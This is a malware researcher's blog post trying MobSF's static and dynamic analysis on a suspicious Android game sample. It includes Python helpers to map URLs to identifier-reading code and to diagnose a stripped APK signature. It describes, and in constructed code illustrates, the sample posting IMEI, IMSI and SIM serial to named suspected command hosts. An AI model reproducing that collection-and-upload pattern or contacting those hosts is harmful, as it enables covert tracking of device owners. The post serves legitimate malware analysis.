Blind try of MobSF over a suspicious Android sample

Static analysis with MobSF

For an impatient user, a 3-minute analysis seems a bit long; however, it completes without any issue :)
Looks like an asset is decrypted and perhaps dynamically loaded afterwards

Which asset is decrypted and is it loaded dynamically?

public static final String b = "mosco";
...
public p69691c7b(Context context) { this.Z = false; try { InputStream decryptAsset = DecryptAsset.decryptAsset(context.getAssets(), b);...

Executing OS commands?

The code issues two commands: (1) logcat -d -v RAW -s AndroidRuntime:E -p package, which retrieves the malware's own runtime error messages, and (2) a command that clears the log. Fortunately, neither command is a real issue: they only concern the malware itself and its capacity to debug itself.

MobSF says malware author(s) do not write secure code 😆

CnC?

Some are obviously benign (e.g. maps.google.com), but I’ll definitely check d.wiyux.com, lzn1007.blog.sohu.com, and wap.juliu.net (not shown on the image, below).
The URL table shows where URLs are used. Very handy.
The code shows the malware posts various device information to Wiyux.com. Nothing too sensitive apart from the IMEI (returned by p() and sent in the did field; q() returns the Android ID). In some other classes, the code sets cookies for this URL.
public static final String str_help_msg_en = "Plants VS Zombs 2.4\nProgrammer:lzn1007\nMAIL:liangzhenning@gmail.com\nBlog:http://lzn1007.blog.sohu.com\n\nGame Mode:\nDAY:Ordinary mode of existence.\nNIGHT: [..]
The code sends the IMEI, SIM serial number, IMSI and Build model.
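The two findings above (the URL table telling you where each URL is used, and the identifier-reading calls sitting next to the Wiyux.com POST) can be reproduced outside MobSF. The script below is an added example written for this post, not MobSF's code and not the sample's: it scans decompiled sources for scheme-prefixed URLs, maps each URL to the files that contain it, and reports which device identifiers those same files read. The source fragments, file names and the /api/report path are constructed stand-ins for the real classes.

```python
import re
from collections import defaultdict

# Scheme-prefixed URLs as they appear inside decompiled Java string literals.
URL_RE = re.compile(r"https?://[A-Za-z0-9.\-]+(?:/[^\s\"'<>)]*)?")

# Identifier-returning calls named in the analysis above (TelephonyManager getters,
# Build.MODEL and the Settings.Secure android_id key).
IDENTIFIER_APIS = {
    "getDeviceId(": "IMEI",
    "getSimSerialNumber(": "SIM serial",
    "getSubscriberId(": "IMSI",
    "Build.MODEL": "Build model",
    "android_id": "Android ID",
    "ANDROID_ID": "Android ID",
}

# Constructed decompiled-source fragments standing in for the sample's classes.
# File names, the /api/report path and the Java bodies are illustrative, not the real code.
SOURCES = {
    "com/constructed/ReportTask.java": """
        private static final String REPORT_URL = "http://d.wiyux.com/api/report";
        public String p() { return tm.getDeviceId(); }
        public String q() { return Settings.Secure.getString(cr, "android_id"); }
        void send() {
            Map<String, String> m = new HashMap<>();
            m.put("did", p());
            m.put("aid", q());
            m.put("sim", tm.getSimSerialNumber());
            m.put("imsi", tm.getSubscriberId());
            m.put("model", Build.MODEL);
            post(REPORT_URL, m);
        }
    """,
    "com/constructed/MapView.java": """
        String u = "http://maps.google.com/maps?q=" + lat + "," + lng;
    """,
    "com/constructed/Strings.java": """
        public static final String str_help_msg_en = "Plants VS Zombs 2.4\\nProgrammer:lzn1007\\nBlog:http://lzn1007.blog.sohu.com\\n";
    """,
}


def find_urls(sources: dict[str, str]) -> dict[str, list[str]]:
    """URL -> sorted list of files containing it (the shape of MobSF's URL table)."""
    table = defaultdict(set)
    for path, code in sources.items():
        for m in URL_RE.finditer(code):
            table[m.group(0)].add(path)
    return {url: sorted(files) for url, files in table.items()}


def identifiers_used(code: str) -> set[str]:
    """Labels of the identifier APIs referenced anywhere in one source file."""
    return {label for needle, label in IDENTIFIER_APIS.items() if needle in code}


def correlate(sources: dict[str, str]) -> dict[str, dict]:
    """For each URL, which files reference it and which device identifiers those files read."""
    report = {}
    for url, files in find_urls(sources).items():
        ids = set()
        for path in files:
            ids |= identifiers_used(sources[path])
        report[url] = {"files": files, "identifiers": sorted(ids)}
    return report


if __name__ == "__main__":
    for url, info in correlate(SOURCES).items():
        print(url, info)
```

Point it at a jadx or apktool output directory by filling SOURCES from the .java or .smali files on disk; a URL whose files also read the IMEI or IMSI is the one to look at first, while a URL in a class that touches no identifier (the maps.google.com case here) can be triaged last.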

Dynamic analysis

$ adb install ksapp.apk
Performing Streamed Install
adb: failed to install ksapp.apk: Failure [INSTALL_PARSE_FAILED_NO_CERTIFICATES: Failed to collect certificates from /data/app/vmdl1088091278.tmp/base.apk: META-INF/OBFUSCAT.SF indicates /data/app/vmdl1088091278.tmp/base.apk is signed using APK Signature Scheme v2, but no such signature was found. Signature stripped?]
  1. Generate a test keystore with keytool
  2. Sign the “faulty” apk with apksigner (ships with the Android SDK). In my case: ~/Android/Sdk/build-tools/30.0.3/apksigner sign --ks my.jks --min-sdk-version 25 --in ksapp.apk --out signed-ksapp.apk
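The adb error above is worth confirming before re-signing: META-INF/OBFUSCAT.SF carries an X-Android-APK-Signed header claiming scheme v2, yet the APK Signing Block that should sit just before the zip central directory is absent. The checker below is an added example written for this post (not MobSF's code, not apksigner's): it reads the .SF main section for that header, then looks for the signing block framing (uint64 size, id-value pairs, uint64 size, the 16-byte "APK Sig Block 42" magic) immediately before the central directory offset recorded in the End Of Central Directory record. The helper that builds sample APKs is a constructed stand-in: a zip with placeholder digests and, optionally, a content-free signing block spliced in, so it runs offline.

```python
import io
import struct
import zipfile

EOCD_SIG = b"PK\x05\x06"
SIG_BLOCK_MAGIC = b"APK Sig Block 42"


def eocd_offset(data: bytes) -> int:
    """Offset of the End Of Central Directory record (last occurrence of its signature)."""
    off = data.rfind(EOCD_SIG)
    if off < 0:
        raise ValueError("no EOCD record: not a zip/APK")
    return off


def central_directory_offset(data: bytes) -> int:
    """Start of the central directory, as recorded 16 bytes into the EOCD record."""
    return struct.unpack_from("<I", data, eocd_offset(data) + 16)[0]


def has_apk_signing_block(data: bytes) -> bool:
    """True if an APK Signing Block (the v2/v3 container) ends right before the central directory.

    Layout: uint64 size | id-value pairs | uint64 size | 16-byte magic; 'size' excludes
    the leading size field, so the block occupies size + 8 bytes.
    """
    cd = central_directory_offset(data)
    if cd < 32 or data[cd - 16:cd] != SIG_BLOCK_MAGIC:
        return False
    size = struct.unpack_from("<Q", data, cd - 24)[0]
    start = cd - 8 - size
    return start >= 0 and struct.unpack_from("<Q", data, start)[0] == size


def sf_files_claiming_v2(data: bytes) -> list[str]:
    """Names of META-INF/*.SF whose main section has X-Android-APK-Signed listing version 2."""
    hits = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for name in zf.namelist():
            if not (name.startswith("META-INF/") and name.upper().endswith(".SF")):
                continue
            text = zf.read(name).decode("utf-8", "replace").replace("\r\n", "\n")
            main_section = text.split("\n\n", 1)[0]  # headers end at the first blank line
            for line in main_section.split("\n"):
                key, _, value = line.partition(":")
                if key.strip().lower() == "x-android-apk-signed":
                    if "2" in {v.strip() for v in value.split(",")}:
                        hits.append(name)
    return hits


def diagnose(data: bytes) -> str:
    """'stripped' reproduces the adb failure: v1 metadata promises v2, but the block is gone."""
    claims = sf_files_claiming_v2(data)
    if claims and not has_apk_signing_block(data):
        return "stripped"
    if has_apk_signing_block(data):
        return "v2-block-present"
    return "v1-only"


# Constructed .SF text: placeholder digests, header shape as apksigner writes it.
SF_CLAIMING_V2 = (
    "Signature-Version: 1.0\r\n"
    "Created-By: 1.0 (Android)\r\n"
    "SHA-256-Digest-Manifest: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=\r\n"
    "X-Android-APK-Signed: 2\r\n"
    "\r\n"
    "Name: classes.dex\r\n"
    "SHA-256-Digest: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=\r\n"
    "\r\n"
)


def build_sample_apk(sf_text: str, with_sig_block: bool) -> bytes:
    """Constructed stand-in for an APK: a zip with one .SF, optionally with a signing block spliced in."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_STORED) as zf:
        zf.writestr("classes.dex", b"dex\n035\x00placeholder")
        zf.writestr("META-INF/OBFUSCAT.SF", sf_text)
    data = buf.getvalue()
    if not with_sig_block:
        return data
    pairs = b""  # a real block carries the v2 signature here; only the framing matters for the parser
    size = len(pairs) + 8 + 16
    block = struct.pack("<Q", size) + pairs + struct.pack("<Q", size) + SIG_BLOCK_MAGIC
    cd = central_directory_offset(data)
    out = bytearray(data[:cd] + block + data[cd:])
    struct.pack_into("<I", out, eocd_offset(out) + 16, cd + len(block))  # repoint EOCD at the moved CD
    return bytes(out)


if __name__ == "__main__":
    print(diagnose(build_sample_apk(SF_CLAIMING_V2, with_sig_block=False)))  # the ksapp.apk situation
    print(diagnose(build_sample_apk(SF_CLAIMING_V2, with_sig_block=True)))
```

On a real file, `diagnose(open("ksapp.apk", "rb").read())` returning "stripped" means exactly what the adb message suspects, and the keytool/apksigner steps above are the right fix; "v1-only" would point at a different install problem.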
The dynamic analysis UI is nice, but IMHO not ergonomic at all! The columns for Frida Logs or Frida Code Editor are too small (unless your screen is very large!)
  • Frida logs show nothing interesting [in the case of this sample]
  • The AES script does not launch: probably the sample does not reach the point where AES decryption is triggered?
The sample is stuck on this splash screen and crashes when I click 😢 to try and get more code executed.

Have I missed anything?

Recap / Conclusion

  • Pros. I particularly like the “Android API” and “URL” tables. I also like being able to jump quickly to the relevant part of the code. The dynamic analysis works well; compared to House and Dexcalibur, I appreciated that it installs the APK and the Frida server automatically.
  • Cons (personal!). For malware analysts, the static analysis displays lots of useless information, e.g. we don’t care how the developer could have secured his/her code better 😉 Also, searching within the code is limited: MobSF clearly does not have the features of a real decompiler. I miss cross references! Finally, I didn’t like the UI of the dynamic analysis: too small, not intuitive, with useless features (e.g. taking screenshots of the emulator, or viewing the emulator in the web page: we can do that easily from the emulator itself) while other features would need more explanation (what the options do, whether a Frida script is loaded or not, how to respawn an APK etc.). On this account, Dexcalibur’s web interface is much better: we understand what the buttons do quite intuitively. The good news is that all of this is perfectly fixable 😃

Mobile and IoT malware researcher. The postings on this account are solely my own opinion and do not represent my employer.

@cryptax